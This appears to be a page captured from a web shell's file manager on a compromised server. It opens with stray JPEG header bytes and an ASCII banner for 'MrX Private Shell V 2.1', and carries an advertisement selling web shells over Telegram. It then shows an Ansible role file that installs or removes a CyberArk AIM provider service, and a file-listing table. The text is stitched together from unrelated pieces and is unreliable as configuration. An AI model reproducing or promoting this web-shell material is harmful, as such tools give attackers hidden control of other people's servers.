����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
---
- name: Validating Role Parameters
assert:
that:
- api_base_url != ''
- state in ["present", "absent"]
- (not use_shared_logon_authentication|default(false) and password_object is defined) or
(use_shared_logon_authentication|default(false) and password_object is not defined)
- name: Verify status of aimprv service initially
command: service aimprv status
register: service_already_running
ignore_errors: true
changed_when: false
args:
warn: false
- debug: msg="status of service RC={{service_already_running.rc}}"
- import_tasks: installAIMProvider.yml
when: (state == "present" and service_already_running.rc != 0)
- import_tasks: uninstallAIMProvider.yml
when: (state == "absent" and service_already_running.rc == 0)| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| installAIMProvider.yml | File | 4.88 KB | 0644 |
|
| main.yml | File | 778 B | 0644 |
|
| uninstallAIMProvider.yml | File | 1.76 KB | 0644 |
|